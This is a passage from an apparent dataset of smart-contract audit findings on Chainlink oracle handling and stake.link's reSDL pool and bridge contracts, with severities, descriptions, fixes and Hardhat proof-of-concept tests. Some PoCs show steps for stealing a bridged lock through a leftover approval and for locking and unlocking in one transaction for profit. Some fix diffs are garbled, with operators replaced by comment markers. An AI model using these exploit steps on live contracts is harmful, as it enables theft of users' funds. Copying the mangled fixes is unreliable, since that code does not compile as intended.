aggregatorRoundID`.\\nThe `phaseID` changes whenever there is an upgrade to the underlying aggregator, and this change causes a significant jump in the `roundID` values due to the bit-shifting operation described in the documentation.\\nref here: https://docs.chain.link/data-feeds/historical-data#solidity\\nThe Beanstalk `LibChainlinkOracle` misinterprets the progression of `roundID` as sequential, overlooking Chainlink's unique bundling of `phaseId` and `aggregatorRoundId`. With the advancement of `phaseID`, there's an exponential increase in `roundID` by 2^64, leading to a temporal suspension until a new interval commences. This will instigate a denial-of-service scenario. The `getEthUsdTwap and getEthUsdPrice` functions are particularly susceptible to this vulnerability, as they rely on accurate TWAP values for their computations, which effects for example any calls reliant on Oracle data.\\n```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n\\n```\\n function latestRoundData()\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n Phase memory current = currentPhase; // cache storage reads\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = current.aggregator.latestRoundData();\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, current.id);\\n }\\n```\\n\\nhttps://etherscan.io/address/0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419#code\\nThe code segment extracted from the ETH/USD Chainlink aggregator above highlights the composite structure of `roundId`, integrating both `phaseId` and aggregatorRoundId. As highlighted, an increment in `phaseId` leads to a substantial leap in `roundId by 2^64`, thereby bypassing a number of ""rounds."" Consequently, any attempt to query currentRound - 1 post-upgrade encounters a non-existent round, triggering a revert. This condition could persist up to 24 hours based on configuration, impacting the timely execution of getEthUsdTwap and getEthUsdPrice.\\nThese functions, once operational again, might utilize altered TWAP values for computations, diverging from expected outcomes",Check return values of roundId. If the `roundID` is a nonzero value and is reverting then the oracle needs to try again with a lower `phaseId.`,"If a `phaseID` increment occurs, it results in a jump in ``````roundID values, creating a gap in the sequence. When there are attempts to access round data for `roundIDs` within this gap, it will encounter inaccurate rounds, potentially causing the function to fail or return incorrect data, considering when the `phaseID` is incremented the `roundID increases by 2 ** 64.` This discrepancy can lead to a denial-of-servicein any calls to the oracle.","```\\nfunction getRoundData(uint80 _roundId)\\n public\\n view\\n virtual\\n override\\n returns (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n )\\n {\\n (uint16 phaseId, uint64 aggregatorRoundId) = parseIds(_roundId);\\n\\n (\\n uint80 roundId,\\n int256 answer,\\n uint256 startedAt,\\n uint256 updatedAt,\\n uint80 ansIn\\n ) = phaseAggregators[phaseId].getRoundData(aggregatorRoundId);\\n\\n return addPhaseIds(roundId, answer, startedAt, updatedAt, ansIn, phaseId);\\n }\\n```\\n" +A user can steal an already transfered and bridged reSDL lock because of approval,high,"The reSDL token approval is not deleted when the lock is bridged to an other chain\\nWhen a reSDL token is bridged to an other chain, the `handleOutgoingRESDL()` function is called to make the state changes into the `sdlPool` contract. The function executes the following:\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n\\nAs we can see, it deletes the lock.amount of the lockId, removes the ownership of the lock and decrements the lock balance of the account that is bridging the lock. The approval that the user had before bridging the reSDL lock will remain there and he can get benefited from it by stealing the NFT. Consider the following situation: A user knows that there is a victim that is willing to pay the underlying value for a reSDL lock ownership transfer. What the malicious user can do is set approval to move his lockId in all supported chains to an alt address that he owns. Then, he trades the underlying value for the reSDL ownership and the lock is transfered to the victim/buyer. If the buyer keeps the lock in this chain nothing happens, but if he bridges any of the other supported chains, the malicious user can use the approval of his alt account to steal the reSDL lock.\\nIt is written inside `resdl-token-bridge.test.ts` because it uses its setup\\n```\\n it('PoC steal reSDL', async () => {\\n let lockId = 2\\n\\n let thief = accounts[0]\\n let victim = accounts[1]\\n\\n let thiefAccount2 = accounts[2]\\n\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n // Thief approves an alt account that he controls to move his lock in the original chain\\n await sdlPool.approve(thiefAccount2, lockId)\\n\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief bridges the lock to an other chain but the approval is not deleted\\n await bridge.transferRESDL(77, victim, lockId, true, toEther(10), { value: toEther(10) })\\n let lastRequestMsg = await onRamp.getLastRequestMessage()\\n assert.deepEqual(\\n ethers.utils.defaultAbiCoder\\n .decode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],\\n lastRequestMsg[1]\\n )\\n .map((d, i) => {\\n if (i == 0) return d\\n if (i > 1 && i < 4) return fromEther(d)\\n return d.toNumber()\\n }),\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n )\\n assert.deepEqual(\\n lastRequestMsg[2].map((d) => [d.token, fromEther(d.amount)]),\\n [[sdlToken.address, 1000]]\\n )\\n assert.equal(lastRequestMsg[3], wrappedNative.address)\\n assert.equal(lastRequestMsg[4], '0x11')\\n await expect(sdlPool.ownerOf(lockId)).to.be.revertedWith('InvalidLockId()')\\n\\n // The user that received the lock from bridging on the other chain decides to bridge the lock id\\n // back to the original chain\\n await offRamp\\n .connect(signers[6])\\n .executeSingleMessage(\\n ethers.utils.formatBytes32String('messageId'),\\n 77,\\n ethers.utils.defaultAbiCoder.encode(\\n ['address', 'uint256', 'uint256', 'uint256', 'uint64', 'uint64', 'uint64'],\\n [victim, lockId, 1000, 1000, ts, 365 * 86400, 0]\\n ),\\n sdlPoolCCIPController.address,\\n [{ token: sdlToken.address, amount: toEther(25) }]\\n )\\n\\n\\n // Now the victim owns the reSDL lock on the original chain\\n assert.equal(await sdlPool.ownerOf(2), victim)\\n\\n // However, this lockId has the approval that originally the thief set to his alt account and victim do not know that\\n assert.equal(await sdlPool.getApproved(2), thiefAccount2);\\n\\n // Thief transfers back to his main account the reSDL via his alt account\\n await sdlPool\\n .connect(signers[2])\\n .transferFrom(victim, thief, lockId)\\n\\n // Thief is now the owner of the reSDL\\n assert.equal(await sdlPool.ownerOf(2), thief)\\n })\\n```\\n","When bridging a lock between chains, the lock approval should be deleted.\\n```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n \\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n// Add the line below\\n delete tokenApprovals[_lockId];\\n\\n uint256 totalAmount = lock.amount // Add the line below\\n lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] // Add the line below\\n= totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n","High, possibility to steal funds","```\\n function handleOutgoingRESDL(\\n address _sender,\\n uint256 _lockId,\\n address _sdlReceiver\\n )\\n external\\n onlyCCIPController\\n onlyLockOwner(_lockId, _sender)\\n updateRewards(_sender)\\n updateRewards(ccipController)\\n returns (Lock memory)\\n {\\n Lock memory lock = locks[_lockId];\\n\\n delete locks[_lockId].amount;\\n delete lockOwners[_lockId];\\n balances[_sender] -= 1;\\n\\n uint256 totalAmount = lock.amount + lock.boostAmount;\\n effectiveBalances[_sender] -= totalAmount;\\n effectiveBalances[ccipController] += totalAmount;\\n\\n sdlToken.safeTransfer(_sdlReceiver, lock.amount);\\n\\n emit OutgoingRESDL(_sender, _lockId);\\n\\n return lock;\\n }\\n```\\n" +Insufficient Gas Limit Specification for Cross-Chain Transfers in _buildCCIPMessage() method. WrappedTokenBridge.sol #210,low,"The _buildCCIPMessage() function in the WrappedTokenBridge contract does not specify a gasLimit for the execution of the ccipReceive() function on the destination blockchain. This omission can lead to unpredictable gas costs and potential failure of the message processing due to out-of-gas errors.\\nThe Client.EVM2AnyMessage struct created by _buildCCIPMessage() is used to define the details of a cross-chain message, including the tokens to be transferred and the receiver's address. However, the struct lacks a gasLimit field in the extraArgs, which is crucial for determining the maximum amount of gas that can be consumed when the ccipReceive() function is called on the destination chain.\\nWithout a specified gasLimit, the default gas limit set by the CCIP router or the destination chain's infrastructure is used. This default may not align with the actual gas requirements of the ccipReceive() function, potentially leading to failed transactions or higher-than-expected fees.\\n` function _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({token: address(wrappedToken), amount: _amount}); tokenAmounts[0] = tokenAmount;\\n```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: """",\\n tokenAmounts: tokenAmounts,\\n extraArgs: ""0x"",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n\\n`","To address the issue of not including a gasLimit in the _transferTokens method, we can take inspiration from the sendMessage() example and modify the _buildCCIPMessage function within the WrappedTokenBridge contract to include a gasLimit in the extraArgs field of the EVM2AnyMessage struct. This will ensure that the CCIP message sent to the destination blockchain includes a specified maximum amount of gas that can be consumed during the execution of the ccipReceive() function.\\nfunction _buildCCIPMessage( address _receiver, uint256 _amount, address _feeTokenAddress ) internal view returns (Client.EVM2AnyMessage memory) { Client.EVMTokenAmount[] memory tokenAmounts = new Client.EVMTokenAmount; Client.EVMTokenAmount memory tokenAmount = Client.EVMTokenAmount({ token: address(wrappedToken), amount: _amount }); tokenAmounts[0] = tokenAmount;\\n// // Include a gasLimit in the extraArgs Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({ receiver: abi.encode(_receiver), data: """", tokenAmounts: tokenAmounts, extraArgs: Client._argsToBytes( Client.EVMExtraArgsV1({gasLimit: 200_000, strict: false}) // Additional arguments, setting gas limit and non-strict sequency mode ), feeToken: _feeTokenAddress });\\n```\\nreturn evm2AnyMessage;\\n```\\n\\n}\\nIncludes a gasLimit field, which is set to 200,000 in this example. This value should be adjusted based on the expected gas consumption of the ccipReceive() function on the destination chain. By including the gasLimit in the extraArgs, you ensure that the CCIP message has a specified maximum gas limit for execution, which can prevent out-of-gas errors and control the cost of the cross-chain transfer.","If the default gas limit is too low, the ccipReceive() function may run out of gas, causing the transaction to fail on the destination chain.\\nWithout a specified gasLimit, the cost of sending a message can vary, making it difficult for users to predict the required fees.\\nIf the default gas limit is higher than necessary, users may overpay for gas that is not used, as unspent gas is not refunded.","```\\n Client.EVM2AnyMessage memory evm2AnyMessage = Client.EVM2AnyMessage({\\n receiver: abi.encode(_receiver),\\n data: """",\\n tokenAmounts: tokenAmounts,\\n extraArgs: ""0x"",\\n feeToken: _feeTokenAddress\\n });\\n\\n return evm2AnyMessage;\\n}\\n```\\n" +Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.,low,"`Ownable` contains a function named `renounceOwnership()` which can be used to remove the ownership of contracts in a protocol.\\nThis can lead to `SDLPoolCCIPControllerPrimary`, `SDLPoolCCIPControllerPrimary`, `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts becoming disowned, which will then break critical functions of the protocol.\\nThe `WrappedTokenBridge`, `LinearBoostController` and `RESDLTokenBridge` contracts inherit from `Ownable`, `SDLPoolCCIPControllerPrimary` from `SDLPoolCCIPController` which inherits `Ownable`, and `SDLPoolCCIPControllerSecondary` inherits from SDLPoolCCIPControllerPrimary; and hence inherit `renounceOwnership()` function.\\nThe owner could accidentally (or intentionally) call `renounceOwnership()` which transfers ownership to `address(0)`. This will break numerous functions within each contract referenced that has the `onlyOwner()` modifier assigned. Below are a list of those functions:\\n`SDLPoolCCIPControllerPrimary`\\n`setRewardsInitiator()`\\n`setWrappedRewardToken()`\\n`approveRewardTokens()`\\n`removeWhitelistedChain()`\\n`addWhitelistedChain()`\\n`SDLPoolCCIPControllerSecondary`\\n`setExtraArgs()`\\n`WrappedTokenBridge`\\n`recoverTokens()`\\n`transferTokens()`\\n`LinearBoostController`\\n`setMaxLockingDuration()`\\n`setMaxBoost()`\\n`RESDLTokenBridge`.\\n`setExtraArgs()`\\nPOC\\nAdd this test to `test/core/ccip/sdl-pool-ccip-controller-primary.test.ts`\\n```\\n it.only('renounce ownership', async () => {\\n console.log(""Owner before"", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log(""Set max link fee with onlyOwner modifier"", await controller.maxLINKFee())\\n \\n // renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log(""set max link fee hasn't changed"", await controller.maxLINKFee())\\n // console out the owner\\n console.log(""Owner after"", await controller.owner())\\n \\n })\\n```\\n","Accidental `renounceOwnership()` call can disrupt key operations in multiple contracts.\\nDisable `renounceOwnership()` if function in the Ownable contract not required.\\n```\\n// Add the line below\\n function renounceOwnership() public override onlyOwner {\\n// Add the line below\\n revert (""Not allowed"");\\n// Add the line below\\n }\\n```\\n",,"```\\n it.only('renounce ownership', async () => {\\n console.log(""Owner before"", await controller.owner())\\n // set max link fee\\n await controller.setMaxLINKFee(toEther(100))\\n // console out the max link fee\\n console.log(""Set max link fee with onlyOwner modifier"", await controller.maxLINKFee())\\n \\n // renounce ownership using renounceOwnership() from owner contract\\n await expect(controller.renounceOwnership())\\n // set max link fee and expect revert\\n await expect(controller.setMaxLINKFee(toEther(200))).to.be.revertedWith('Ownable: caller is not the owner')\\n // console out the max link fee\\n console.log(""set max link fee hasn't changed"", await controller.maxLINKFee())\\n // console out the owner\\n console.log(""Owner after"", await controller.owner())\\n \\n })\\n```\\n" +No way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.,medium,"There is no way to revoke the approval which given via the approvefunction They may able execute transfers even after the owner revokes their permission using the `setApprovalForAll` function.\\nThe `setApprovalForAll` function allows the owner to approve anyone as the operator.\\n```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n\\nIn the same vein, the `approve` function allows the owner or operator to `approve` anyone to transfer the lock.\\n```\\n function approve(address _to, uint256 _lockId) external {\\n address owner = ownerOf(_lockId);\\n\\n if (_to == owner) revert ApprovalToCurrentOwner(); //@note\\n if (msg.sender != owner && !isApprovedForAll(owner, msg.sender)) revert SenderNotAuthorized();\\n\\n tokenApprovals[_lockId] = _to;\\n emit Approval(owner, _to, _lockId);\\n }\\n```\\n\\nNote that in the function, lock cannot be approved to the owner (but can be approved to any of the operators), and can be called by the owner/operator (see the `isApprovedForAll` modifier).\\nIf the operator approves himself to the lock, using the `approve` function, and later on, his operator status gets revoked, his lock approval status is not cleared, meaning he still has access to the lock.\\nAs an extreme example\\nUser1 owns 5 locks.\\nHe calls the `setApprovalForAll` setting User2 as his operator.\\nUser2 calls the `approve` function on all 5 locks (It succeeds as there's no check preventing this unlike with the lock owner), getting herself both operator approval and token approvals.\\nUser1 revokes User2's operator status.\\nUser2 still has access to the locks and can transfer them.","No way to revoke approval in the SDLPool might lead to unauthorized calling transfer of locks.\\nInclude a check to see if the `_to` in the `approve` function is an operator, revert if it is. Or clear an operator's token approvals after revoking his operator status.","Uncleared approval, gives access to transfer token.","```\\n function setApprovalForAll(address _operator, bool _approved) external {\\n address owner = msg.sender;\\n if (owner == _operator) revert ApprovalToCaller();\\n\\n operatorApprovals[owner][_operator] = _approved;\\n emit ApprovalForAll(owner, _operator, _approved);\\n }\\n```\\n" +A user can lose funds in `sdlPoolSecondary` if tries to add more sdl tokens to a lock that has been queued to be completely withdrawn,medium,"In a secondary chain, if a user adds more sdl amount into a lock that he has queued to withdraw all the amount in the same index batch, he will lose the extra amount he deposited\\nThe process to withdraw all the funds from a lock in a primary chain is just by calling withdraw with all the base amount of the lock. At this point the user will get immediately his funds back and the lock will be deleted, hence the owner will be zero address.\\nHowever, in a secondary chain, a user has to queue a withdraw of all the funds and wait for the keeper to send the update to the primary chain to execute the updates and then receive his sdl token back. In this period of time when the keeper does not send the update to the primary chain, if a user queues a withdraw of all the lock base amount, he will still own the lock because the withdraw has not been executed, just queued. So the user can still do whatever modification in his lock, for example, increase his lock base amount by calling `transferAndCall()` in the `sdlToken` passing the address of the `sdlSecondaryPool` as argument.\\nIf this happens, when the keeper send the update to the primary chain and the user executes the updates for his lockId, he will lose this extra amount he deposited because it will execute the updates in order, and it will start with the withdraw of all the funds, will delete the ownership (make the zero address as the owner), and then increase the base amount of the lock that now owns the zero address.\\nAnd basically the lockId will be owned by the zero address with base amount as the extra sdl tokens that the user sent.\\nIt is written inside `sdl-pool-secondary.test.ts` because it uses its setup\\n```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log(""The user has lost"", sdlLost.toString(), ""sdl tokens"")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n\\nOutput:\\n```\\n SDLPoolSecondary\\nThe user has lost 1000000000000000000000 sdl tokens\\n ✔ PoC user is not able to execute his lock updates (159ms)\\n\\n\\n 1 passing (3s)\\n```\\n","When trying to do any action on a lock in a secondary pool, check if the last update queued has not 0 as the base amount. Because if it is the case, that would mean that the user queued a withdraw of all funds and he will lose ownership of the lock at the next keeper update.\\n```\\n function _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n ) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n// Add the line below\\n if(lock.amount == 0) revert();\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange // Add the line below\\n=\\n int256(lockUpdate.lock.amount // Add the line below\\n lockUpdate.lock.boostAmount) -\\n int256(lock.amount // Add the line below\\n lock.boostAmount);\\n if (updateNeeded == 0) updateNeeded = 1;\\n\\n emit QueueUpdateLock(_owner, _lockId, lockUpdate.lock.amount, lockUpdate.lock.boostAmount, lockUpdate.lock.duration);\\n }\\n```\\n","High, user will lose funds","```\\n it('PoC user will lose extra deposited tokens', async () => {\\n\\n let user = accounts[1]\\n let initialUserSDLBalance = await sdlToken.balanceOf(user);\\n\\n // User creates a lock depositing some amount\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(100),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(1)\\n await sdlPool.connect(signers[1]).executeQueuedOperations([])\\n\\n assert.equal(await sdlPool.ownerOf(1), user)\\n \\n // User queues a withdraw of all the amount from the lock\\n await sdlPool.connect(signers[1]).withdraw(1, toEther(100))\\n\\n // User wants to deposit more tokens to the lock without the withdraw being updated and still being in the queue\\n await sdlToken\\n .connect(signers[1])\\n .transferAndCall(\\n sdlPool.address,\\n toEther(1000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [1, 0])\\n )\\n\\n await sdlPool.handleOutgoingUpdate()\\n await sdlPool.handleIncomingUpdate(2)\\n // When executing the updates, zero address will be the owner of his lock\\n // and the amount he diposited the last time will be lost\\n await sdlPool.connect(signers[1]).executeQueuedOperations([1])\\n\\n let finalUserSDLBalance = await sdlToken.balanceOf(user);\\n let sdlLost = initialUserSDLBalance.sub(finalUserSDLBalance)\\n\\n console.log(""The user has lost"", sdlLost.toString(), ""sdl tokens"")\\n\\n // This staticall should revert because now the lock owner is the zero address\\n await expect(sdlPool.ownerOf(1)).to.be.revertedWith('InvalidLockId()')\\n })\\n```\\n" +Can lock Fund for 1 sec and unlock in same transaction to gain profit,low,"Can lock Fund for 1 sec and unlock in same transaction to gain profit even if it's small amount yet there's no flashloan protection so malicious user can flashloan big amount and sandwich the rebasing upkeep to take advantage of the pool with dividing leads to zero problem to gain profit from pool.This way totalstaked amount can be manupilated. Checkupkeep and performUkeep completely user accessible so totalstake amount can change for the favor of malicious user\\n\\n```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n\\n```\\n import { Signer } from 'ethers'\\nimport { assert, expect } from 'chai'\\nimport {\\n toEther,\\n deploy,\\n getAccounts,\\n setupToken,\\n fromEther,\\n deployUpgradeable,\\n} from '../../utils/helpers'\\nimport {\\n ERC677,\\n LinearBoostController,\\n RewardsPool,\\n SDLPoolPrimary,\\n StakingAllowance,\\n Attacker\\n} from '../../../typechain-types'\\nimport { ethers } from 'hardhat'\\nimport { time } from '@nomicfoundation/hardhat-network-helpers'\\n//1 day in seconds// rest of code\\nconst DAY = 86400\\n\\n// parsing Lock struct in contracts// rest of code\\nconst parseLocks = (locks: any) =>\\n locks.map((l: any) => ({\\n amount: fromEther(l.amount),\\n //show 4 digits after decimal// rest of code\\n boostAmount: Number(fromEther(l.boostAmount).toFixed(10)),\\n startTime: l.startTime.toNumber(),\\n duration: l.duration.toNumber(),\\n expiry: l.expiry.toNumber(),\\n }))\\n\\n const parseData=(data:any)=>({\\n operator:data.operator,\\n from:data.from,\\n tokenId:data.tokenId,\\n data: Buffer.from(data.data.slice(2), 'hex').toString('utf8')\\n })\\n\\ndescribe('SDLPoolPrimary', () => {\\n let sdlToken: StakingAllowance\\n let rewardToken: ERC677\\n let rewardsPool: RewardsPool\\n let boostController: LinearBoostController\\n let sdlPool: SDLPoolPrimary\\n let signers: Signer[]\\n let accounts: string[]\\n let attacker:Attacker\\n before(async () => {\\n ;({ signers, accounts } = await getAccounts())\\n })\\n\\n beforeEach(async () => {\\n sdlToken = (await deploy('StakingAllowance', ['stake.link', 'SDL'])) as StakingAllowance\\n rewardToken = (await deploy('ERC677', ['Chainlink', 'LINK', 1000000000])) as ERC677\\n\\n await sdlToken.mint(accounts[0], toEther(1000000))\\n await setupToken(sdlToken, accounts)\\n\\n boostController = (await deploy('LinearBoostController', [\\n 4 * 365 * DAY,\\n 4,\\n ])) as LinearBoostController\\n\\n sdlPool = (await deployUpgradeable('SDLPoolPrimary', [\\n 'Reward Escrowed SDL',\\n 'reSDL',\\n sdlToken.address,\\n boostController.address,\\n ])) as SDLPoolPrimary\\n\\n rewardsPool = (await deploy('RewardsPool', [\\n sdlPool.address,\\n rewardToken.address,\\n ])) as RewardsPool\\n\\n await sdlPool.addToken(rewardToken.address, rewardsPool.address)\\n await sdlPool.setCCIPController(accounts[0])\\n //attack contract deployment -- setting bridge contract to same we wont need ccip here\\n attacker=await deploy(""Attacker"",[sdlPool.address,sdlPool.address,sdlToken.address]) as Attacker\\n await sdlToken.transfer(attacker.address,toEther(20000))\\n const sender = signers[0] // or choose any unlocked account\\n const valueToSend = ethers.utils.parseEther(""100"") // Amount of Ether to send\\n const tx = await sender.sendTransaction({\\n to: attacker.address,\\n value: valueToSend,\\n });\\n \\n await tx.wait();\\n console.log(""Funded contract!"");\\n })\\n it('should be able to lock an existing stake', async () => {\\n //with flashloan this may prove fatal// rest of code\\n await sdlToken.transferAndCall(\\n sdlPool.address,\\n toEther(10000),\\n ethers.utils.defaultAbiCoder.encode(['uint256', 'uint64'], [0, 0])\\n )\\n await sdlPool.extendLockDuration(1, 365 * DAY)\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n\\n assert.equal(fromEther(await sdlPool.totalEffectiveBalance()), 200)\\n assert.equal(fromEther(await sdlPool.totalStaked()), 200)\\n assert.equal(fromEther(await sdlPool.effectiveBalanceOf(accounts[0])), 200)\\n assert.equal(fromEther(await sdlPool.staked(accounts[0])), 200)\\n assert.deepEqual(parseLocks(await sdlPool.getLocks([1])), [\\n { amount: 100, boostAmount: 100, startTime: ts, duration: 365 * DAY, expiry: 0 },\\n ])\\n\\n // Move one block forward\\n //await ethers.provider.send('evm_mine', []);\\n //console.log(""Parsed lock :"",parseLocks(await sdlPool.getLocks([1])))\\n })\\n //@audit NFT onERC721receiver doesnt work it seems..\\n it('usage of Attack contract and receiving NFT', async () => {\\n console.log(""Block-number before tx:"",await ethers.provider.getBlockNumber())\\n let ts = (await ethers.provider.getBlock(await ethers.provider.getBlockNumber())).timestamp\\n // Move one block forward\\n await ethers.provider.send('evm_mine', [ts+1]);\\n console.log(""SDLToken balance Before:"",await sdlToken.balanceOf(attacker.address))\\n await attacker.attackTransfernCall()\\n console.log(""Lock"",parseLocks(await sdlPool.getLocks([1])))\\n console.log(""Block-number after tx:"",await ethers.provider.getBlockNumber())\\n console.log(""Nft received ??:"",await attacker.received());\\n//boostAmount: 0.0006341958 20_000 -> with flashloan\\n//boostAmount: 0.000006342 200 \\n })\\n})\\n```\\n",Setting lower-limit of locking time to stop bypassing 1 transaction lock-unlock-withdraw .This way it might stop the flashloan attacks too. Preferable minimum 1 day.,Loss of pool reward gained by rebasing.,```\\nnpx hardhat test --network hardhat --grep 'usage of Attack contract and receiving NFT'\\n```\\n +Attacker can exploit lock update logic on secondary chains to increase the amount of rewards sent to a specific secondary chain,medium,"Users with existing reSDL NFTs on secondary chains (prior to a decrease in maxBoost) are able to increase `queuedRESDLSupplyChange` by a greater amount than should be possible given the current `maxBoost` value, which then allows them to funnel more rewards to their secondary chain (as `queuedRESDLSupplyChange` maps to `reSDLSupplyByChain[...]`, which is used to calculate the rewards distributed to each secondary chain).\\nConsider the scenario in which the stake.link team is decreasing the `maxBoost` value of the `LinearBoostController` so that newer depositors will get less rewards than OG depositors. This will allow an attacker on a secondary chain to perform the following attack to fraudulently increase the amount of rewards sent to their chain:\\nWe will assume for simplicity that the starting values for the `LinearBoostController` contract is a maxBoost=10 and `maxLockingDuration` = 10_000 seconds. The attacker starts with a single (for simplicity) reSDL NFT on a secondary chain which has amount=100_000 and lockingDuration= 5_000 seconds, meaning their boost is calculated to be: 100_000 * 10 * 5_000/10_000 = 500_000.\\nThen, the stake.link team decreases `maxBoost` to 5. Following this, the attacker will first call `SDLPoolSecondary:extendLockDuration` with a `_lockingDuration` of 9_999, which then calls the internal `_queueLockUpdate`, which is defined as follows:\\n```\\nfunction _queueLockUpdate(\\n address _owner,\\n uint256 _lockId,\\n uint256 _amount,\\n uint64 _lockingDuration\\n) internal onlyLockOwner(_lockId, _owner) {\\n Lock memory lock = _getQueuedLockState(_lockId);\\n LockUpdate memory lockUpdate = LockUpdate(updateBatchIndex, _updateLock(lock, _amount, _lockingDuration));\\n queuedLockUpdates[_lockId].push(lockUpdate);\\n queuedRESDLSupplyChange +=\\n int256(lockUpdate.lock.amount + lockUpdate.lock.boostAmount) -\\n int256(lock.amount + lock.boostAmount);\\n // rest of code\\n}\\n```\\n\\nAs part of this function call, `_updateLock` is triggered to perform this update, which is defined as follows:\\n```\\nfunction 